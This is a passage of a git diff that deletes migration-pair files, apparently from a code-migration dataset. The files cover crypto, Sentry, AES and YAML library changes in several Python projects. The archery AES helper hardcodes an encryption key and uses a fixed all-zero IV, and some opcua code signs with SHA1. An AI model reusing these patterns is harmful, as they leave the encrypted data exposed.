return x509.load_pem_x509_certificate(f.read(), default_backend()) -+ else: -+ return x509.load_der_x509_certificate(f.read(), default_backend()) - - --def dem_to_der(data): -- """ -- ssh.PEM_cert_to_DER_cert seems to have issues with python3 bytes, so we wrap it -- """ -- data = PEM_cert_to_DER_cert(data.decode("utf8")) -- return data -+def x509_from_der(data): -+ if not data: -+ return None -+ return x509.load_der_x509_certificate(data, default_backend()) - - --def encrypt_aes(key, raw): -- #key = hashlib.sha256(key.encode()).digest() -- key = key.exportKey(format="DER") -- raw = pad(raw) -- iv = Random.new().read(AES.block_size) -- cipher = AES.new(key, AES.MODE_CBC, iv) -- return base64.b64encode(iv + cipher.encrypt(raw)) -+def load_private_key(path): -+ with open(path, "br") as f: -+ return serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) - - --def decrypt_aes(key, enc): -- enc = base64.b64decode(enc) -- iv = enc[:16] -- cipher = AES.new(key, AES.MODE_CBC, iv) -- return unpad(cipher.decrypt(enc[16:])) -+def der_from_x509(certificate): -+ if certificate is None: -+ return b"" -+ return certificate.public_bytes(serialization.Encoding.DER) - - --def encrypt_rsa_oaep(privkey, data): -- if not type(privkey) is RSA._RSAobj: -- privkey = RSA.importKey(privkey) -- cipher = PKCS1_OAEP.new(privkey, Hash.SHA256) -- #cipher = PKCS1_OAEP.new(privkey, Hash.SHA) -- ciphertext = cipher.encrypt(data) -- return ciphertext -- -- --def pubkey_from_dercert(der): -- cert = DerSequence() -- cert.decode(der) -- tbsCertificate = DerSequence() -- tbsCertificate.decode(cert[0]) -- subjectPublicKeyInfo = tbsCertificate[6] -- -- # Initialize RSA key -- rsa_key = RSA.importKey(subjectPublicKeyInfo) -- return rsa_key -- -- --def sign_sha256(key, data): -- if not type(key) is RSA._RSAobj: -- key = RSA.importKey(key) -- myhash = SHA256.new(data).digest() -- signature = key.sign(myhash, '') -- return signature -+def sign_sha1(private_key, data): -+ signer = private_key.signer( -+ padding.PKCS1v15(), -+ hashes.SHA1() -+ ) -+ signer.update(data) -+ return signer.finalize() - - --def sign_sha1(key, data): -- if not type(key) is RSA._RSAobj: -- key = RSA.importKey(key) -- myhash = SHA.new(data) -- signer = PKCS1_v1_5.new(key) -- signature = signer.sign(myhash) -- return signature -- -- -+def encrypt_basic256(public_key, data): -+ ciphertext = public_key.encrypt( -+ data, -+ padding.OAEP( -+ mgf=padding.MGF1(algorithm=hashes.SHA256()), -+ algorithm=hashes.SHA256(), -+ label=None) -+ ) -+ return ciphertext - - - if __name__ == "__main__": -- import OpenSSL - # Convert from PEM to DER -- pem = open("../examples/server_cert.pem").read() -- der = PEM_cert_to_DER_cert(pem) -- rsa_pubkey = pubkey_from_dercert(der) -- priv_pem = open("../examples/mykey.pem").read() -- rsa_privkey = RSA.importKey(priv_pem) -- #lines = pem.replace(" ",'').split() -- #der = a2b_base64(''.join(lines[1:-1])) -- cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem) -- -+ cert = load_certificate("../examples/server_cert.pem") -+ #rsa_pubkey = pubkey_from_dercert(der) -+ rsa_privkey = load_private_key("../examples/mykey.pem") - -- # Extract subjectPublicKeyInfo field from X.509 certificate (see RFC3280) -- #cert = DerSequence() -- #cert.decode(der) -- #tbsCertificate = DerSequence() -- #tbsCertificate.decode(cert[0]) -- #subjectPublicKeyInfo = tbsCertificate[6] -- -- # Initialize RSA key -- #rsa_key = RSA.importKey(subjectPublicKeyInfo) -- print("Pub Key", rsa_pubkey) -- print("Priv Key", rsa_privkey) -- msg = encrypt256(rsa_privkey, b"this is my message") -- print("Encrypted data: ", msg) - from IPython import embed - embed() diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py deleted file mode 100644 index 1d5ebf3..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py +++ /dev/null @@ -1,113 +0,0 @@ -from Crypto.Util.asn1 import DerSequence -from ssl import PEM_cert_to_DER_cert -from ssl import DER_cert_to_PEM_cert -import base64 -import hashlib - - -from Crypto.Signature import PKCS1_v1_5 -from Crypto.Hash import SHA256 -from Crypto.Hash import SHA -from Crypto.PublicKey import RSA -from Crypto.Cipher import AES -from Crypto.Cipher import PKCS1_OAEP -from Crypto import Hash -from Crypto import Random - -BS = 16 -pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) -unpad = lambda s: s[:-ord(s[len(s) - 1:])] - - -def dem_to_der(data): - """ - ssh.PEM_cert_to_DER_cert seems to have issues with python3 bytes, so we wrap it - """ - data = PEM_cert_to_DER_cert(data.decode("utf8")) - return data - - -def encrypt_aes(key, raw): - #key = hashlib.sha256(key.encode()).digest() - key = key.exportKey(format="DER") - raw = pad(raw) - iv = Random.new().read(AES.block_size) - cipher = AES.new(key, AES.MODE_CBC, iv) - return base64.b64encode(iv + cipher.encrypt(raw)) - - -def decrypt_aes(key, enc): - enc = base64.b64decode(enc) - iv = enc[:16] - cipher = AES.new(key, AES.MODE_CBC, iv) - return unpad(cipher.decrypt(enc[16:])) - - -def encrypt_rsa_oaep(privkey, data): - if not type(privkey) is RSA._RSAobj: - privkey = RSA.importKey(privkey) - cipher = PKCS1_OAEP.new(privkey, Hash.SHA256) - #cipher = PKCS1_OAEP.new(privkey, Hash.SHA) - ciphertext = cipher.encrypt(data) - return ciphertext - - -def pubkey_from_dercert(der): - cert = DerSequence() - cert.decode(der) - tbsCertificate = DerSequence() - tbsCertificate.decode(cert[0]) - subjectPublicKeyInfo = tbsCertificate[6] - - # Initialize RSA key - rsa_key = RSA.importKey(subjectPublicKeyInfo) - return rsa_key - - -def sign_sha256(key, data): - if not type(key) is RSA._RSAobj: - key = RSA.importKey(key) - myhash = SHA256.new(data).digest() - signature = key.sign(myhash, '') - return signature - - -def sign_sha1(key, data): - if not type(key) is RSA._RSAobj: - key = RSA.importKey(key) - myhash = SHA.new(data) - signer = PKCS1_v1_5.new(key) - signature = signer.sign(myhash) - return signature - - - - -if __name__ == "__main__": - import OpenSSL - # Convert from PEM to DER - pem = open("../examples/server_cert.pem").read() - der = PEM_cert_to_DER_cert(pem) - rsa_pubkey = pubkey_from_dercert(der) - priv_pem = open("../examples/mykey.pem").read() - rsa_privkey = RSA.importKey(priv_pem) - #lines = pem.replace(" ",'').split() - #der = a2b_base64(''.join(lines[1:-1])) - cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem) - - - # Extract subjectPublicKeyInfo field from X.509 certificate (see RFC3280) - #cert = DerSequence() - #cert.decode(der) - #tbsCertificate = DerSequence() - #tbsCertificate.decode(cert[0]) - #subjectPublicKeyInfo = tbsCertificate[6] - - # Initialize RSA key - #rsa_key = RSA.importKey(subjectPublicKeyInfo) - print("Pub Key", rsa_pubkey) - print("Priv Key", rsa_privkey) - msg = encrypt256(rsa_privkey, b"this is my message") - print("Encrypted data: ", msg) - from IPython import embed - embed() diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py deleted file mode 100644 index 8fd1b0a..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py +++ /dev/null @@ -1,63 +0,0 @@ -import os - -from cryptography import x509 -from cryptography.hazmat.backends import default_backend -from cryptography.hazmat.primitives import serialization -from cryptography.hazmat.primitives import hashes -from cryptography.hazmat.primitives.asymmetric import padding - - -def load_certificate(path): - _, ext = os.path.splitext(path) - with open(path, "br") as f: - if ext == ".pem": - return x509.load_pem_x509_certificate(f.read(), default_backend()) - else: - return x509.load_der_x509_certificate(f.read(), default_backend()) - - -def x509_from_der(data): - if not data: - return None - return x509.load_der_x509_certificate(data, default_backend()) - - -def load_private_key(path): - with open(path, "br") as f: - return serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) - - -def der_from_x509(certificate): - if certificate is None: - return b"" - return certificate.public_bytes(serialization.Encoding.DER) - - -def sign_sha1(private_key, data): - signer = private_key.signer( - padding.PKCS1v15(), - hashes.SHA1() - ) - signer.update(data) - return signer.finalize() - - -def encrypt_basic256(public_key, data): - ciphertext = public_key.encrypt( - data, - padding.OAEP( - mgf=padding.MGF1(algorithm=hashes.SHA256()), - algorithm=hashes.SHA256(), - label=None) - ) - return ciphertext - - -if __name__ == "__main__": - # Convert from PEM to DER - cert = load_certificate("../examples/server_cert.pem") - #rsa_pubkey = pubkey_from_dercert(der) - rsa_privkey = load_private_key("../examples/mykey.pem") - - from IPython import embed - embed() diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff deleted file mode 100644 index 31f7566..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/src/runserver.py b/src/runserver.py - index caa95e093b7ba45a88620efc71ad9e72b381d30c..0a65bcc2ce97a2e3ad9b028b1cf9bcc58499f5d9 100644 - --- a/src/runserver.py - +++ b/src/runserver.py -@@ -3,9 +3,13 @@ from myaas.settings import DEBUG, SENTRY_DSN - - app.debug = DEBUG - --if SENTRY_DSN: -- from raven.contrib.flask import Sentry -- Sentry(app, dsn=SENTRY_DSN) -+import sentry_sdk -+from sentry_sdk.integrations.flask import FlaskIntegration -+ -+sentry_sdk.init( -+ dsn=SENTRY_DSN, -+ integrations=[FlaskIntegration()] -+) - - if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py deleted file mode 100644 index 94884e2..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py +++ /dev/null @@ -1,11 +0,0 @@ -from myaas.server import app -from myaas.settings import DEBUG, SENTRY_DSN - -app.debug = DEBUG - -if SENTRY_DSN: - from raven.contrib.flask import Sentry - Sentry(app, dsn=SENTRY_DSN) - -if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py deleted file mode 100644 index df9c493..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py +++ /dev/null @@ -1,15 +0,0 @@ -from myaas.server import app -from myaas.settings import DEBUG, SENTRY_DSN - -app.debug = DEBUG - -import sentry_sdk -from sentry_sdk.integrations.flask import FlaskIntegration - -sentry_sdk.init( - dsn=SENTRY_DSN, - integrations=[FlaskIntegration()] -) - -if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff deleted file mode 100644 index d8de093..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/sql/utils/aes_decryptor.py b/sql/utils/aes_decryptor.py - index fe8352ccf9fc4faa17103f341d62dcaafc60a7fa..e192ca69e2d610bc59a9f10165c7fd1c8ab9b157 100644 - --- a/sql/utils/aes_decryptor.py - +++ b/sql/utils/aes_decryptor.py -@@ -4,7 +4,7 @@ from binascii import b2a_hex, a2b_hex - - class Prpcrypt(): - def __init__(self): -- self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E' -+ self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E'.encode('utf-8') - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, -@@ -23,7 +23,7 @@ class Prpcrypt(): - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) -- self.ciphertext = cryptor.encrypt(text) -+ self.ciphertext = cryptor.encrypt(text.encode('utf-8')) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') -@@ -37,8 +37,7 @@ class Prpcrypt(): - - if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 -- import sys -- e = pc.encrypt(sys.argv[1]) # 加密 -+ e = pc.encrypt('123456') # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py deleted file mode 100644 index 28fabbe..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py +++ /dev/null @@ -1,44 +0,0 @@ -from Crypto.Cipher import AES -from binascii import b2a_hex, a2b_hex - - -class Prpcrypt(): - def __init__(self): - self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E' - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, - # 如果大于16当时不是16的倍数,那就补足为16的倍数。 - def encrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - # 这里密钥key 长度必须为16(AES-128), - # 24(AES-192),或者32 (AES-256)Bytes 长度 - # 目前AES-128 足够目前使用 - length = 16 - count = len(text) - if count < length: - add = (length - count) - # \0 backspace - text = text + ('\0' * add) - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) - self.ciphertext = cryptor.encrypt(text) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') - - # 解密后,去掉补足的空格用strip() 去掉 - def decrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - plain_text = cryptor.decrypt(a2b_hex(text)) - return plain_text.decode().rstrip('\0') - - -if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 - import sys - e = pc.encrypt(sys.argv[1]) # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py deleted file mode 100644 index d51aff3..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py +++ /dev/null @@ -1,43 +0,0 @@ -from Crypto.Cipher import AES -from binascii import b2a_hex, a2b_hex - - -class Prpcrypt(): - def __init__(self): - self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E'.encode('utf-8') - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, - # 如果大于16当时不是16的倍数,那就补足为16的倍数。 - def encrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - # 这里密钥key 长度必须为16(AES-128), - # 24(AES-192),或者32 (AES-256)Bytes 长度 - # 目前AES-128 足够目前使用 - length = 16 - count = len(text) - if count < length: - add = (length - count) - # \0 backspace - text = text + ('\0' * add) - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) - self.ciphertext = cryptor.encrypt(text.encode('utf-8')) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') - - # 解密后,去掉补足的空格用strip() 去掉 - def decrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - plain_text = cryptor.decrypt(a2b_hex(text)) - return plain_text.decode().rstrip('\0') - - -if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 - e = pc.encrypt('123456') # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff deleted file mode 100644 index 2d8d6f6..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff +++ /dev/null @@ -1,26 +0,0 @@ -diff --git a/beem/utils.py b/beem/utils.py - index c5d5d7bd42aca84d70ca3a4036fa8d1c00c877cb..f5ba90e2cc5bb88b29b173bae11ba46e06efecf7 100644 - --- a/beem/utils.py - +++ b/beem/utils.py -@@ -6,7 +6,7 @@ import math - from datetime import datetime, tzinfo, timedelta, date, time - import pytz - import difflib --import yaml -+from ruamel.yaml import YAML - - timeFormat = "%Y-%m-%dT%H:%M:%S" - # https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -@@ -371,9 +371,10 @@ def seperate_yaml_dict_from_body(content): - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] -- parameter = yaml.load(yaml_content, Loader=yaml.FullLoader) -+ yaml=YAML(typ="safe") -+ parameter = yaml.load(yaml_content) - if not isinstance(parameter, dict): -- parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " "), Loader=yaml.FullLoader) -+ parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " ")) - else: - body = content - return body, parameter diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py deleted file mode 100644 index 36a631c..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py +++ /dev/null @@ -1,387 +0,0 @@ -# -*- coding: utf-8 -*- -import re -import json -import time as timenow -import math -from datetime import datetime, tzinfo, timedelta, date, time -import pytz -import difflib -import yaml - -timeFormat = "%Y-%m-%dT%H:%M:%S" -# https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -# @@ (source offset, length) (target offset, length) @@ (section header) -RE_HUNK_HEADER = re.compile( - r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)$", flags=re.MULTILINE -) - - -def formatTime(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, float): - return datetime.utcfromtimestamp(t).strftime("%Y%m%dt%H%M%S%Z") - if isinstance(t, (datetime, date, time)): - return t.strftime("%Y%m%dt%H%M%S%Z") - - -def addTzInfo(t, timezone="UTC"): - """Returns a datetime object with tzinfo added""" - if t and isinstance(t, (datetime, date, time)) and t.tzinfo is None: - utc = pytz.timezone(timezone) - t = utc.localize(t) - return t - - -def formatTimeString(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, (datetime, date, time)): - return t.strftime(timeFormat) - return addTzInfo(datetime.strptime(t, timeFormat)) - - -def formatToTimeStamp(t): - """ Returns a timestamp integer - - :param datetime t: datetime object - :return: Timestamp as integer - """ - if isinstance(t, (datetime, date, time)): - t = addTzInfo(t) - else: - t = formatTimeString(t) - epoch = addTzInfo(datetime(1970, 1, 1)) - return int((t - epoch).total_seconds()) - - -def formatTimeFromNow(secs=0): - """ Properly Format Time that is `x` seconds in the future - - :param int secs: Seconds to go in the future (`x>0`) or the - past (`x<0`) - :return: Properly formated time for Graphene (`%Y-%m-%dT%H:%M:%S`) - :rtype: str - - """ - return datetime.utcfromtimestamp(timenow.time() + int(secs)).strftime(timeFormat) - - -def formatTimedelta(td): - """Format timedelta to String - """ - if not isinstance(td, timedelta): - return "" - days, seconds = td.days, td.seconds - hours = days * 24 + seconds // 3600 - minutes = (seconds % 3600) // 60 - seconds = seconds % 60 - return "%d:%s:%s" % (hours, str(minutes).zfill(2), str(seconds).zfill(2)) - - -def parse_time(block_time): - """Take a string representation of time from the blockchain, and parse it - into datetime object. - """ - utc = pytz.timezone("UTC") - return utc.localize(datetime.strptime(block_time, timeFormat)) - - -def assets_from_string(text): - """Correctly split a string containing an asset pair. - - Splits the string into two assets with the separator being on of the - following: ``:``, ``/``, or ``-``. - """ - return re.split(r"[\-:\/]", text) - - -def sanitize_permlink(permlink): - permlink = permlink.strip() - permlink = re.sub(r"_|\s|\.", "-", permlink) - permlink = re.sub(r"[^\w-]", "", permlink) - permlink = re.sub(r"[^a-zA-Z0-9-]", "", permlink) - permlink = permlink.lower() - return permlink - - -def derive_permlink(title, parent_permlink=None, parent_author=None, - max_permlink_length=256, with_suffix=True): - """Derive a permlink from a comment title (for root level - comments) or the parent permlink and optionally the parent - author (for replies). - - """ - suffix = "-" + formatTime(datetime.utcnow()) + "z" - if parent_permlink and parent_author: - prefix = "re-" + sanitize_permlink(parent_author) + "-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - elif parent_permlink: - prefix = "re-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - else: - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - else: - rem_chars = max_permlink_length - body = sanitize_permlink(title)[:rem_chars] - if len(body) == 0: # empty title or title consisted of only special chars - return suffix[1:] # use timestamp only, strip leading "-" - if with_suffix: - return body + suffix - else: - return body - - -def resolve_authorperm(identifier): - """Correctly split a string containing an authorperm. - - Splits the string into author and permlink with the - following separator: ``/``. - - Examples: - - .. code-block:: python - - >>> from beem.utils import resolve_authorperm - >>> author, permlink = resolve_authorperm('https://d.tube/#!/v/pottlund/m5cqkd1a') - >>> author, permlink = resolve_authorperm("https://steemit.com/witness-category/@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("https://busy.org/@gtg/24lfrm-gtg-witness-log") - - """ - # without any http(s) - match = re.match(r"@?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(1), match.group(2) - # dtube url - match = re.match(r"([\w\-\.]+[^#?\s]+)/#!/v/?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(2), match.group(3) - # url - match = re.match(r"([\w\-\.]+[^#?\s]+)/@?([\w\-\.]*)/([\w\-]*)", identifier) - if not hasattr(match, "group"): - raise ValueError("Invalid identifier") - return match.group(2), match.group(3) - - -def construct_authorperm(*args): - """ Create a post identifier from comment/post object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorperm - >>> print(construct_authorperm('username', 'permlink')) - @username/permlink - >>> print(construct_authorperm({'author': 'username', 'permlink': 'permlink'})) - @username/permlink - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - author, permlink = op["author"], op["permlink"] - elif len(args) == 2: - author, permlink = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink) - return "{prefix}{author}/{permlink}".format(**fields) - - -def resolve_root_identifier(url): - m = re.match(r"/([^/]*)/@([^/]*)/([^#]*).*", url) - if not m: - return "", "" - else: - category = m.group(1) - author = m.group(2) - permlink = m.group(3) - return construct_authorperm(author, permlink), category - - -def resolve_authorpermvoter(identifier): - """Correctly split a string containing an authorpermvoter. - - Splits the string into author and permlink with the - following separator: ``/`` and ``|``. - """ - pos = identifier.find("|") - if pos < 0: - raise ValueError("Invalid identifier") - [author, permlink] = resolve_authorperm(identifier[:pos]) - return author, permlink, identifier[pos + 1 :] - - -def construct_authorpermvoter(*args): - """ Create a vote identifier from vote object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorpermvoter - >>> print(construct_authorpermvoter('username', 'permlink', 'voter')) - @username/permlink|voter - >>> print(construct_authorpermvoter({'author': 'username', 'permlink': 'permlink', 'voter': 'voter'})) - @username/permlink|voter - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - if "authorperm" in op: - authorperm, voter = op["authorperm"], op["voter"] - [author, permlink] = resolve_authorperm(authorperm) - else: - author, permlink, voter = op["author"], op["permlink"], op["voter"] - elif len(args) == 2: - authorperm, voter = args - [author, permlink] = resolve_authorperm(authorperm) - elif len(args) == 3: - author, permlink, voter = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink, voter=voter) - return "{prefix}{author}/{permlink}|{voter}".format(**fields) - - -def reputation_to_score(rep): - """Converts the account reputation value into the reputation score""" - if isinstance(rep, str): - rep = int(rep) - if rep == 0: - return 25.0 - score = max([math.log10(abs(rep)) - 9, 0]) - if rep < 0: - score *= -1 - score = (score * 9.0) + 25.0 - return score - - -def remove_from_dict(obj, keys=list(), keep_keys=True): - """ Prune a class or dictionary of all but keys (keep_keys=True). - Prune a class or dictionary of specified keys.(keep_keys=False). - """ - if type(obj) == dict: - items = list(obj.items()) - elif isinstance(obj, dict): - items = list(obj.items()) - else: - items = list(obj.__dict__.items()) - if keep_keys: - return {k: v for k, v in items if k in keys} - else: - return {k: v for k, v in items if k not in keys} - - -def make_patch(a, b, n=3): - # _no_eol = '\n' + "\ No newline at end of file" + '\n' - _no_eol = "\n" - diffs = difflib.unified_diff(a.splitlines(True), b.splitlines(True), n=n) - try: - _, _ = next(diffs), next(diffs) - del _ - except StopIteration: - pass - return "".join([d if d[-1] == "\n" else d + _no_eol for d in diffs]) - - -def findall_patch_hunks(body=None): - return RE_HUNK_HEADER.findall(body) - - -def derive_beneficiaries(beneficiaries): - beneficiaries_list = [] - beneficiaries_accounts = [] - beneficiaries_sum = 0 - if not isinstance(beneficiaries, list): - beneficiaries = beneficiaries.split(",") - - for w in beneficiaries: - account_name = w.strip().split(":")[0] - if account_name[0] == "@": - account_name = account_name[1:] - if account_name in beneficiaries_accounts: - continue - if w.find(":") == -1: - percentage = -1 - else: - percentage = w.strip().split(":")[1] - if "%" in percentage: - percentage = percentage.strip().split("%")[0].strip() - percentage = float(percentage) - beneficiaries_sum += percentage - beneficiaries_list.append( - {"account": account_name, "weight": int(percentage * 100)} - ) - beneficiaries_accounts.append(account_name) - - missing = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - missing += 1 - index = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - beneficiaries_list[index]["weight"] = int( - (int(100 * 100) - int(beneficiaries_sum * 100)) / missing - ) - index += 1 - sorted_beneficiaries = sorted( - beneficiaries_list, key=lambda beneficiaries_list: beneficiaries_list["account"] - ) - return sorted_beneficiaries - - -def derive_tags(tags): - tags_list = [] - if len(tags.split(",")) > 1: - for tag in tags.split(","): - tags_list.append(tag.strip()) - elif len(tags.split(" ")) > 1: - for tag in tags.split(" "): - tags_list.append(tag.strip()) - elif len(tags) > 0: - tags_list.append(tags.strip()) - return tags_list - - -def seperate_yaml_dict_from_body(content): - parameter = {} - body = "" - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] - parameter = yaml.load(yaml_content, Loader=yaml.FullLoader) - if not isinstance(parameter, dict): - parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " "), Loader=yaml.FullLoader) - else: - body = content - return body, parameter - - -def load_dirty_json(dirty_json): - regex_replace = [(r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'), (r" False([, \}\]])", r' false\1'), (r" True([, \}\]])", r' true\1')] - for r, s in regex_replace: - dirty_json = re.sub(r, s, dirty_json) - clean_json = json.loads(dirty_json) - return clean_json diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py deleted file mode 100644 index 01a796b..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py +++ /dev/null @@ -1,388 +0,0 @@ -# -*- coding: utf-8 -*- -import re -import json -import time as timenow -import math -from datetime import datetime, tzinfo, timedelta, date, time -import pytz -import difflib -from ruamel.yaml import YAML - -timeFormat = "%Y-%m-%dT%H:%M:%S" -# https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -# @@ (source offset, length) (target offset, length) @@ (section header) -RE_HUNK_HEADER = re.compile( - r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)$", flags=re.MULTILINE -) - - -def formatTime(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, float): - return datetime.utcfromtimestamp(t).strftime("%Y%m%dt%H%M%S%Z") - if isinstance(t, (datetime, date, time)): - return t.strftime("%Y%m%dt%H%M%S%Z") - - -def addTzInfo(t, timezone="UTC"): - """Returns a datetime object with tzinfo added""" - if t and isinstance(t, (datetime, date, time)) and t.tzinfo is None: - utc = pytz.timezone(timezone) - t = utc.localize(t) - return t - - -def formatTimeString(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, (datetime, date, time)): - return t.strftime(timeFormat) - return addTzInfo(datetime.strptime(t, timeFormat)) - - -def formatToTimeStamp(t): - """ Returns a timestamp integer - - :param datetime t: datetime object - :return: Timestamp as integer - """ - if isinstance(t, (datetime, date, time)): - t = addTzInfo(t) - else: - t = formatTimeString(t) - epoch = addTzInfo(datetime(1970, 1, 1)) - return int((t - epoch).total_seconds()) - - -def formatTimeFromNow(secs=0): - """ Properly Format Time that is `x` seconds in the future - - :param int secs: Seconds to go in the future (`x>0`) or the - past (`x<0`) - :return: Properly formated time for 